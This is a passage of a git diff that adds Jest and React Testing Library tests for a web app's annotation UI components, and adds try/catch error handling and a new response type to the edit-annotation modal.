+ // Act - Re-render with same props + rerender() + + // Assert - Component should still be visible (no errors thrown) + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should re-render when props change', () => { + // Arrange + const props = { ...defaultProps } + const { rerender } = render() + + // Act - Re-render with different props + const newProps = { ...props, query: 'New query content' } + rerender() + + // Assert - Should show new content + expect(screen.getByText('New query content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.tsx index 2961ce393c..6172a215e4 100644 --- a/web/app/components/app/annotation/edit-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/edit-annotation-modal/index.tsx @@ -53,27 +53,39 @@ const EditAnnotationModal: FC = ({ postQuery = editedContent else postAnswer = editedContent - if (!isAdd) { - await editAnnotation(appId, annotationId, { - message_id: messageId, - question: postQuery, - answer: postAnswer, - }) - onEdited(postQuery, postAnswer) - } - else { - const res: any = await addAnnotation(appId, { - question: postQuery, - answer: postAnswer, - message_id: messageId, - }) - onAdded(res.id, res.account?.name, postQuery, postAnswer) - } + try { + if (!isAdd) { + await editAnnotation(appId, annotationId, { + message_id: messageId, + question: postQuery, + answer: postAnswer, + }) + onEdited(postQuery, postAnswer) + } + else { + const res = await addAnnotation(appId, { + question: postQuery, + answer: postAnswer, + message_id: messageId, + }) + onAdded(res.id, res.account?.name ?? '', postQuery, postAnswer) + } - Toast.notify({ - message: t('common.api.actionSuccess') as string, - type: 'success', - }) + Toast.notify({ + message: t('common.api.actionSuccess') as string, + type: 'success', + }) + } + catch (error) { + const fallbackMessage = t('common.api.actionFailed') as string + const message = error instanceof Error && error.message ? error.message : fallbackMessage + Toast.notify({ + message, + type: 'error', + }) + // Re-throw to preserve edit mode behavior for UI components + throw error + } } const [showModal, setShowModal] = useState(false) diff --git a/web/app/components/app/annotation/empty-element.spec.tsx b/web/app/components/app/annotation/empty-element.spec.tsx new file mode 100644 index 0000000000..56ebb96121 --- /dev/null +++ b/web/app/components/app/annotation/empty-element.spec.tsx @@ -0,0 +1,13 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import EmptyElement from './empty-element' + +describe('EmptyElement', () => { + it('should render the empty state copy and supporting icon', () => { + const { container } = render() + + expect(screen.getByText('appAnnotation.noData.title')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.noData.description')).toBeInTheDocument() + expect(container.querySelector('svg')).not.toBeNull() + }) +}) diff --git a/web/app/components/app/annotation/filter.spec.tsx b/web/app/components/app/annotation/filter.spec.tsx new file mode 100644 index 0000000000..6260ff7668 --- /dev/null +++ b/web/app/components/app/annotation/filter.spec.tsx @@ -0,0 +1,70 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import Filter, { type QueryParam } from './filter' +import useSWR from 'swr' + +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +jest.mock('@/service/log', () => ({ + fetchAnnotationsCount: jest.fn(), +})) + +const mockUseSWR = useSWR as unknown as jest.Mock + +describe('Filter', () => { + const appId = 'app-1' + const childContent = 'child-content' + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should render nothing until annotation count is fetched', () => { + mockUseSWR.mockReturnValue({ data: undefined }) + + const { container } = render( + +
{childContent}
+
, + ) + + expect(container.firstChild).toBeNull() + expect(mockUseSWR).toHaveBeenCalledWith( + { url: `/apps/${appId}/annotations/count` }, + expect.any(Function), + ) + }) + + it('should propagate keyword changes and clearing behavior', () => { + mockUseSWR.mockReturnValue({ data: { total: 20 } }) + const queryParams: QueryParam = { keyword: 'prefill' } + const setQueryParams = jest.fn() + + const { container } = render( + +
{childContent}
+
, + ) + + const input = screen.getByPlaceholderText('common.operation.search') as HTMLInputElement + fireEvent.change(input, { target: { value: 'updated' } }) + expect(setQueryParams).toHaveBeenCalledWith({ ...queryParams, keyword: 'updated' }) + + const clearButton = input.parentElement?.querySelector('div.cursor-pointer') as HTMLElement + fireEvent.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ ...queryParams, keyword: '' }) + + expect(container).toHaveTextContent(childContent) + }) +}) diff --git a/web/app/components/app/annotation/header-opts/index.spec.tsx b/web/app/components/app/annotation/header-opts/index.spec.tsx new file mode 100644 index 0000000000..3d8a1fd4ef --- /dev/null +++ b/web/app/components/app/annotation/header-opts/index.spec.tsx @@ -0,0 +1,439 @@ +import * as React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import type { ComponentProps } from 'react' +import HeaderOptions from './index' +import I18NContext from '@/context/i18n' +import { LanguagesSupported } from '@/i18n-config/language' +import type { AnnotationItemBasic } from '../type' +import { clearAllAnnotations, fetchExportAnnotationList } from '@/service/annotation' + +jest.mock('@headlessui/react', () => { + type PopoverContextValue = { open: boolean; setOpen: (open: boolean) => void } + type MenuContextValue = { open: boolean; setOpen: (open: boolean) => void } + const PopoverContext = React.createContext(null) + const MenuContext = React.createContext(null) + + const Popover = ({ children }: { children: React.ReactNode | ((props: { open: boolean }) => React.ReactNode) }) => { + const [open, setOpen] = React.useState(false) + const value = React.useMemo(() => ({ open, setOpen }), [open]) + return ( + + {typeof children === 'function' ? children({ open }) : children} + + ) + } + + const PopoverButton = React.forwardRef(({ onClick, children, ...props }: { onClick?: () => void; children?: React.ReactNode }, ref: React.Ref) => { + const context = React.useContext(PopoverContext) + const handleClick = () => { + context?.setOpen(!context.open) + onClick?.() + } + return ( + + ) + }) + + const PopoverPanel = React.forwardRef(({ children, ...props }: { children: React.ReactNode | ((props: { close: () => void }) => React.ReactNode) }, ref: React.Ref) => { + const context = React.useContext(PopoverContext) + if (!context?.open) return null + const content = typeof children === 'function' ? children({ close: () => context.setOpen(false) }) : children + return ( +
+ {content} +
+ ) + }) + + const Menu = ({ children }: { children: React.ReactNode }) => { + const [open, setOpen] = React.useState(false) + const value = React.useMemo(() => ({ open, setOpen }), [open]) + return ( + + {children} + + ) + } + + const MenuButton = ({ onClick, children, ...props }: { onClick?: () => void; children?: React.ReactNode }) => { + const context = React.useContext(MenuContext) + const handleClick = () => { + context?.setOpen(!context.open) + onClick?.() + } + return ( + + ) + } + + const MenuItems = ({ children, ...props }: { children: React.ReactNode }) => { + const context = React.useContext(MenuContext) + if (!context?.open) return null + return ( +
+ {children} +
+ ) + } + + return { + Dialog: ({ open, children, className }: { open?: boolean; children: React.ReactNode; className?: string }) => { + if (open === false) return null + return ( +
+ {children} +
+ ) + }, + DialogBackdrop: ({ children, className, onClick }: { children?: React.ReactNode; className?: string; onClick?: () => void }) => ( +
+ {children} +
+ ), + DialogPanel: ({ children, className, ...props }: { children: React.ReactNode; className?: string }) => ( +
+ {children} +
+ ), + DialogTitle: ({ children, className, ...props }: { children: React.ReactNode; className?: string }) => ( +
+ {children} +
+ ), + Popover, + PopoverButton, + PopoverPanel, + Menu, + MenuButton, + MenuItems, + Transition: ({ show = true, children }: { show?: boolean; children: React.ReactNode }) => (show ? <>{children} : null), + TransitionChild: ({ children }: { children: React.ReactNode }) => <>{children}, + } +}) + +let lastCSVDownloaderProps: Record | undefined +const mockCSVDownloader = jest.fn(({ children, ...props }) => { + lastCSVDownloaderProps = props + return ( +
+ {children} +
+ ) +}) + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: () => ({ + CSVDownloader: (props: any) => mockCSVDownloader(props), + Type: { Link: 'link' }, + }), +})) + +jest.mock('@/service/annotation', () => ({ + fetchExportAnnotationList: jest.fn(), + clearAllAnnotations: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }), +})) + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type HeaderOptionsProps = ComponentProps + +const renderComponent = ( + props: Partial = {}, + locale: string = LanguagesSupported[0] as string, +) => { + const defaultProps: HeaderOptionsProps = { + appId: 'test-app-id', + onAdd: jest.fn(), + onAdded: jest.fn(), + controlUpdateList: 0, + ...props, + } + + return render( + + + , + ) +} + +const openOperationsPopover = async (user: ReturnType) => { + const trigger = document.querySelector('button.btn.btn-secondary') as HTMLButtonElement + expect(trigger).toBeTruthy() + await user.click(trigger) +} + +const expandExportMenu = async (user: ReturnType) => { + await openOperationsPopover(user) + const exportLabel = await screen.findByText('appAnnotation.table.header.bulkExport') + const exportButton = exportLabel.closest('button') as HTMLButtonElement + expect(exportButton).toBeTruthy() + await user.click(exportButton) +} + +const getExportButtons = async () => { + const csvLabel = await screen.findByText('CSV') + const jsonLabel = await screen.findByText('JSONL') + const csvButton = csvLabel.closest('button') as HTMLButtonElement + const jsonButton = jsonLabel.closest('button') as HTMLButtonElement + expect(csvButton).toBeTruthy() + expect(jsonButton).toBeTruthy() + return { + csvButton, + jsonButton, + } +} + +const clickOperationAction = async ( + user: ReturnType, + translationKey: string, +) => { + const label = await screen.findByText(translationKey) + const button = label.closest('button') as HTMLButtonElement + expect(button).toBeTruthy() + await user.click(button) +} + +const mockAnnotations: AnnotationItemBasic[] = [ + { + question: 'Question 1', + answer: 'Answer 1', + }, +] + +const mockedFetchAnnotations = jest.mocked(fetchExportAnnotationList) +const mockedClearAllAnnotations = jest.mocked(clearAllAnnotations) + +describe('HeaderOptions', () => { + beforeEach(() => { + jest.clearAllMocks() + jest.useRealTimers() + mockCSVDownloader.mockClear() + lastCSVDownloaderProps = undefined + mockedFetchAnnotations.mockResolvedValue({ data: [] }) + }) + + it('should fetch annotations on mount and render enabled export actions when data exist', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + renderComponent() + + await waitFor(() => { + expect(mockedFetchAnnotations).toHaveBeenCalledWith('test-app-id') + }) + + await expandExportMenu(user) + + const { csvButton, jsonButton } = await getExportButtons() + + expect(csvButton).not.toBeDisabled() + expect(jsonButton).not.toBeDisabled() + + await waitFor(() => { + expect(lastCSVDownloaderProps).toMatchObject({ + bom: true, + filename: 'annotations-en-US', + type: 'link', + data: [ + ['Question', 'Answer'], + ['Question 1', 'Answer 1'], + ], + }) + }) + }) + + it('should disable export actions when there are no annotations', async () => { + const user = userEvent.setup() + renderComponent() + + await expandExportMenu(user) + + const { csvButton, jsonButton } = await getExportButtons() + + expect(csvButton).toBeDisabled() + expect(jsonButton).toBeDisabled() + + expect(lastCSVDownloaderProps).toMatchObject({ + data: [['Question', 'Answer']], + }) + }) + + it('should open the add annotation modal and forward the onAdd callback', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + const onAdd = jest.fn().mockResolvedValue(undefined) + renderComponent({ onAdd }) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalled()) + + await user.click( + screen.getByRole('button', { name: 'appAnnotation.table.header.addAnnotation' }), + ) + + await screen.findByText('appAnnotation.addModal.title') + const questionInput = screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder') + const answerInput = screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder') + + await user.type(questionInput, 'Integration question') + await user.type(answerInput, 'Integration answer') + await user.click(screen.getByRole('button', { name: 'common.operation.add' })) + + await waitFor(() => { + expect(onAdd).toHaveBeenCalledWith({ + question: 'Integration question', + answer: 'Integration answer', + }) + }) + }) + + it('should allow bulk import through the batch modal', async () => { + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.bulkImport') + + expect(await screen.findByText('appAnnotation.batchModal.title')).toBeInTheDocument() + await user.click( + screen.getByRole('button', { name: 'appAnnotation.batchModal.cancel' }), + ) + expect(onAdded).not.toHaveBeenCalled() + }) + + it('should trigger JSONL download with locale-specific filename', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + const originalCreateElement = document.createElement.bind(document) + const anchor = originalCreateElement('a') as HTMLAnchorElement + const clickSpy = jest.spyOn(anchor, 'click').mockImplementation(jest.fn()) + const createElementSpy = jest + .spyOn(document, 'createElement') + .mockImplementation((tagName: Parameters[0]) => { + if (tagName === 'a') + return anchor + return originalCreateElement(tagName) + }) + const objectURLSpy = jest + .spyOn(URL, 'createObjectURL') + .mockReturnValue('blob://mock-url') + const revokeSpy = jest.spyOn(URL, 'revokeObjectURL').mockImplementation(jest.fn()) + + renderComponent({}, LanguagesSupported[1] as string) + + await expandExportMenu(user) + + await waitFor(() => expect(mockCSVDownloader).toHaveBeenCalled()) + + const { jsonButton } = await getExportButtons() + await user.click(jsonButton) + + expect(createElementSpy).toHaveBeenCalled() + expect(anchor.download).toBe(`annotations-${LanguagesSupported[1]}.jsonl`) + expect(clickSpy).toHaveBeenCalled() + expect(revokeSpy).toHaveBeenCalledWith('blob://mock-url') + + const blobArg = objectURLSpy.mock.calls[0][0] as Blob + await expect(blobArg.text()).resolves.toContain('"Question 1"') + + clickSpy.mockRestore() + createElementSpy.mockRestore() + objectURLSpy.mockRestore() + revokeSpy.mockRestore() + }) + + it('should clear all annotations when confirmation succeeds', async () => { + mockedClearAllAnnotations.mockResolvedValue(undefined) + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.clearAll') + + await screen.findByText('appAnnotation.table.header.clearAllConfirm') + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + await waitFor(() => { + expect(mockedClearAllAnnotations).toHaveBeenCalledWith('test-app-id') + expect(onAdded).toHaveBeenCalled() + }) + }) + + it('should handle clear all failures gracefully', async () => { + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + mockedClearAllAnnotations.mockRejectedValue(new Error('network')) + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.clearAll') + await screen.findByText('appAnnotation.table.header.clearAllConfirm') + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + await waitFor(() => { + expect(mockedClearAllAnnotations).toHaveBeenCalled() + expect(onAdded).not.toHaveBeenCalled() + expect(consoleSpy).toHaveBeenCalled() + }) + + consoleSpy.mockRestore() + }) + + it('should refetch annotations when controlUpdateList changes', async () => { + const view = renderComponent({ controlUpdateList: 0 }) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalledTimes(1)) + + view.rerender( + + + , + ) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalledTimes(2)) + }) +}) diff --git a/web/app/components/app/annotation/header-opts/index.tsx b/web/app/components/app/annotation/header-opts/index.tsx index 024f75867c..5f8ef658e7 100644 --- a/web/app/components/app/annotation/header-opts/index.tsx +++ b/web/app/components/app/annotation/header-opts/index.tsx @@ -17,7 +17,7 @@ import Button from '../../../base/button' import AddAnnotationModal from '../add-annotation-modal' import type { AnnotationItemBasic } from '../type' import BatchAddModal from '../batch-add-annotation-modal' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import CustomPopover from '@/app/components/base/popover' import { FileDownload02, FilePlus02 } from '@/app/components/base/icons/src/vender/line/files' import { ChevronRight } from '@/app/components/base/icons/src/vender/line/arrows' diff --git a/web/app/components/app/annotation/index.spec.tsx b/web/app/components/app/annotation/index.spec.tsx new file mode 100644 index 0000000000..4971f5173c --- /dev/null +++ b/web/app/components/app/annotation/index.spec.tsx @@ -0,0 +1,233 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import Annotation from './index' +import type { AnnotationItem } from './type' +import { JobStatus } from './type' +import { type App, AppModeEnum } from '@/types/app' +import { + addAnnotation, + delAnnotation, + delAnnotations, + fetchAnnotationConfig, + fetchAnnotationList, + queryAnnotationJobStatus, +} from '@/service/annotation' +import { useProviderContext } from '@/context/provider-context' +import Toast from '@/app/components/base/toast' + +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { notify: jest.fn() }, +})) + +jest.mock('ahooks', () => ({ + useDebounce: (value: any) => value, +})) + +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + delAnnotation: jest.fn(), + delAnnotations: jest.fn(), + fetchAnnotationConfig: jest.fn(), + editAnnotation: jest.fn(), + fetchAnnotationList: jest.fn(), + queryAnnotationJobStatus: jest.fn(), + updateAnnotationScore: jest.fn(), + updateAnnotationStatus: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('./filter', () => ({ children }: { children: React.ReactNode }) => ( +
{children}
+)) + +jest.mock('./empty-element', () => () =>
) + +jest.mock('./header-opts', () => (props: any) => ( +
+ +
+)) + +let latestListProps: any + +jest.mock('./list', () => (props: any) => { + latestListProps = props + if (!props.list.length) + return
+ return ( +
+ + + +
+ ) +}) + +jest.mock('./view-annotation-modal', () => (props: any) => { + if (!props.isShow) + return null + return ( +
+
{props.item.question}
+ + +
+ ) +}) + +jest.mock('@/app/components/base/pagination', () => () =>
) +jest.mock('@/app/components/base/loading', () => () =>
) +jest.mock('@/app/components/base/features/new-feature-panel/annotation-reply/config-param-modal', () => (props: any) => props.isShow ?
: null) +jest.mock('@/app/components/billing/annotation-full/modal', () => (props: any) => props.show ?
: null) + +const mockNotify = Toast.notify as jest.Mock +const addAnnotationMock = addAnnotation as jest.Mock +const delAnnotationMock = delAnnotation as jest.Mock +const delAnnotationsMock = delAnnotations as jest.Mock +const fetchAnnotationConfigMock = fetchAnnotationConfig as jest.Mock +const fetchAnnotationListMock = fetchAnnotationList as jest.Mock +const queryAnnotationJobStatusMock = queryAnnotationJobStatus as jest.Mock +const useProviderContextMock = useProviderContext as jest.Mock + +const appDetail = { + id: 'app-id', + mode: AppModeEnum.CHAT, +} as App + +const createAnnotation = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-1', + question: overrides.question ?? 'Question 1', + answer: overrides.answer ?? 'Answer 1', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 0, +}) + +const renderComponent = () => render() + +describe('Annotation', () => { + beforeEach(() => { + jest.clearAllMocks() + latestListProps = undefined + fetchAnnotationConfigMock.mockResolvedValue({ + id: 'config-id', + enabled: false, + embedding_model: { + embedding_model_name: 'model', + embedding_provider_name: 'provider', + }, + score_threshold: 0.5, + }) + fetchAnnotationListMock.mockResolvedValue({ data: [], total: 0 }) + queryAnnotationJobStatusMock.mockResolvedValue({ job_status: JobStatus.completed }) + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }) + }) + + it('should render empty element when no annotations are returned', async () => { + renderComponent() + + expect(await screen.findByTestId('empty-element')).toBeInTheDocument() + expect(fetchAnnotationListMock).toHaveBeenCalledWith(appDetail.id, expect.objectContaining({ + page: 1, + keyword: '', + })) + }) + + it('should handle annotation creation and refresh list data', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + addAnnotationMock.mockResolvedValue(undefined) + + renderComponent() + + await screen.findByTestId('list') + fireEvent.click(screen.getByTestId('trigger-add')) + + await waitFor(() => { + expect(addAnnotationMock).toHaveBeenCalledWith(appDetail.id, { question: 'new question', answer: 'new answer' }) + expect(mockNotify).toHaveBeenCalledWith(expect.objectContaining({ + message: 'common.api.actionSuccess', + type: 'success', + })) + }) + expect(fetchAnnotationListMock).toHaveBeenCalledTimes(2) + }) + + it('should support viewing items and running batch deletion success flow', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + delAnnotationsMock.mockResolvedValue(undefined) + delAnnotationMock.mockResolvedValue(undefined) + + renderComponent() + await screen.findByTestId('list') + + await act(async () => { + latestListProps.onSelectedIdsChange([annotation.id]) + }) + await waitFor(() => { + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + + await act(async () => { + await latestListProps.onBatchDelete() + }) + await waitFor(() => { + expect(delAnnotationsMock).toHaveBeenCalledWith(appDetail.id, [annotation.id]) + expect(mockNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'success', + })) + expect(latestListProps.selectedIds).toEqual([]) + }) + + fireEvent.click(screen.getByTestId('list-view')) + expect(screen.getByTestId('view-modal')).toBeInTheDocument() + + await act(async () => { + fireEvent.click(screen.getByTestId('view-modal-remove')) + }) + await waitFor(() => { + expect(delAnnotationMock).toHaveBeenCalledWith(appDetail.id, annotation.id) + }) + }) + + it('should show an error notification when batch deletion fails', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + const error = new Error('failed') + delAnnotationsMock.mockRejectedValue(error) + + renderComponent() + await screen.findByTestId('list') + + await act(async () => { + latestListProps.onSelectedIdsChange([annotation.id]) + }) + await waitFor(() => { + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + + await act(async () => { + await latestListProps.onBatchDelete() + }) + + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'error', + message: error.message, + }) + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + }) +}) diff --git a/web/app/components/app/annotation/index.tsx b/web/app/components/app/annotation/index.tsx index 32d0c799fc..2d639c91e4 100644 --- a/web/app/components/app/annotation/index.tsx +++ b/web/app/components/app/annotation/index.tsx @@ -25,7 +25,7 @@ import { sleep } from '@/utils' import { useProviderContext } from '@/context/provider-context' import AnnotationFullModal from '@/app/components/billing/annotation-full/modal' import { type App, AppModeEnum } from '@/types/app' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { delAnnotations } from '@/service/annotation' type Props = { diff --git a/web/app/components/app/annotation/list.spec.tsx b/web/app/components/app/annotation/list.spec.tsx new file mode 100644 index 0000000000..9f8d4c8855 --- /dev/null +++ b/web/app/components/app/annotation/list.spec.tsx @@ -0,0 +1,116 @@ +import React from 'react' +import { fireEvent, render, screen, within } from '@testing-library/react' +import List from './list' +import type { AnnotationItem } from './type' + +const mockFormatTime = jest.fn(() => 'formatted-time') + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: mockFormatTime, + }), +})) + +const createAnnotation = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-id', + question: overrides.question ?? 'question 1', + answer: overrides.answer ?? 'answer 1', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 2, +}) + +const getCheckboxes = (container: HTMLElement) => container.querySelectorAll('[data-testid^="checkbox"]') + +describe('List', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should render annotation rows and call onView when clicking a row', () => { + const item = createAnnotation() + const onView = jest.fn() + + render( + , + ) + + fireEvent.click(screen.getByText(item.question)) + + expect(onView).toHaveBeenCalledWith(item) + expect(mockFormatTime).toHaveBeenCalledWith(item.created_at, 'appLog.dateTimeFormat') + }) + + it('should toggle single and bulk selection states', () => { + const list = [createAnnotation({ id: 'a', question: 'A' }), createAnnotation({ id: 'b', question: 'B' })] + const onSelectedIdsChange = jest.fn() + const { container, rerender } = render( + , + ) + + const checkboxes = getCheckboxes(container) + fireEvent.click(checkboxes[1]) + expect(onSelectedIdsChange).toHaveBeenCalledWith(['a']) + + rerender( + , + ) + const updatedCheckboxes = getCheckboxes(container) + fireEvent.click(updatedCheckboxes[1]) + expect(onSelectedIdsChange).toHaveBeenCalledWith([]) + + fireEvent.click(updatedCheckboxes[0]) + expect(onSelectedIdsChange).toHaveBeenCalledWith(['a', 'b']) + }) + + it('should confirm before removing an annotation and expose batch actions', async () => { + const item = createAnnotation({ id: 'to-delete', question: 'Delete me' }) + const onRemove = jest.fn() + render( + , + ) + + const row = screen.getByText(item.question).closest('tr') as HTMLTableRowElement + const actionButtons = within(row).getAllByRole('button') + fireEvent.click(actionButtons[1]) + + expect(await screen.findByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + fireEvent.click(confirmButton) + expect(onRemove).toHaveBeenCalledWith(item.id) + + expect(screen.getByText('appAnnotation.batchAction.selected')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/app/annotation/list.tsx b/web/app/components/app/annotation/list.tsx index 4135b4362e..62a0c50e60 100644 --- a/web/app/components/app/annotation/list.tsx +++ b/web/app/components/app/annotation/list.tsx @@ -7,7 +7,7 @@ import type { AnnotationItem } from './type' import RemoveAnnotationConfirmModal from './remove-annotation-confirm-modal' import ActionButton from '@/app/components/base/action-button' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Checkbox from '@/app/components/base/checkbox' import BatchAction from './batch-action' diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('RemoveAnnotationConfirmModal', () => { + // Rendering behavior driven by isShow and translations + describe('Rendering', () => { + test('should display the confirm modal when visible', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Remove annotation?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render modal content when hidden', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Remove annotation?')).not.toBeInTheDocument() + }) + }) + + // User interactions with confirm and cancel buttons + describe('Interactions', () => { + test('should call onHide when cancel button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onRemove).not.toHaveBeenCalled() + }) + + test('should call onRemove when confirm button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onRemove).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/type.ts b/web/app/components/app/annotation/type.ts index 5df6f51ace..e2f2264f07 100644 --- a/web/app/components/app/annotation/type.ts +++ b/web/app/components/app/annotation/type.ts @@ -12,6 +12,12 @@ export type AnnotationItem = { hit_count: number } +export type AnnotationCreateResponse = AnnotationItem & { + account?: { + name?: string + } +} + export type HitHistoryItem = { id: string question: string diff --git a/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..dec0ad0c01 --- /dev/null +++ b/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx @@ -0,0 +1,158 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import ViewAnnotationModal from './index' +import type { AnnotationItem, HitHistoryItem } from '../type' +import { fetchHitHistoryList } from '@/service/annotation' + +const mockFormatTime = jest.fn(() => 'formatted-time') + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: mockFormatTime, + }), +})) + +jest.mock('@/service/annotation', () => ({ + fetchHitHistoryList: jest.fn(), +})) + +jest.mock('../edit-annotation-modal/edit-item', () => { + const EditItemType = { + Query: 'query', + Answer: 'answer', + } + return { + __esModule: true, + default: ({ type, content, onSave }: { type: string; content: string; onSave: (value: string) => void }) => ( +
+
{content}
+ +
+ ), + EditItemType, + } +}) + +const fetchHitHistoryListMock = fetchHitHistoryList as jest.Mock + +const createAnnotationItem = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-id', + question: overrides.question ?? 'question', + answer: overrides.answer ?? 'answer', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 0, +}) + +const createHitHistoryItem = (overrides: Partial = {}): HitHistoryItem => ({ + id: overrides.id ?? 'hit-id', + question: overrides.question ?? 'query', + match: overrides.match ?? 'match', + response: overrides.response ?? 'response', + source: overrides.source ?? 'source', + score: overrides.score ?? 0.42, + created_at: overrides.created_at ?? 1700000000, +}) + +const renderComponent = (props?: Partial>) => { + const item = createAnnotationItem() + const mergedProps: React.ComponentProps = { + appId: 'app-id', + isShow: true, + onHide: jest.fn(), + item, + onSave: jest.fn().mockResolvedValue(undefined), + onRemove: jest.fn().mockResolvedValue(undefined), + ...props, + } + return { + ...render(), + props: mergedProps, + } +} + +describe('ViewAnnotationModal', () => { + beforeEach(() => { + jest.clearAllMocks() + fetchHitHistoryListMock.mockResolvedValue({ data: [], total: 0 }) + }) + + it('should render annotation tab and allow saving updated query', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByTestId('edit-query')) + + // Assert + await waitFor(() => { + expect(props.onSave).toHaveBeenCalledWith('query-updated', props.item.answer) + }) + }) + + it('should render annotation tab and allow saving updated answer', async () => { + // Arrange + const { props } = renderComponent() 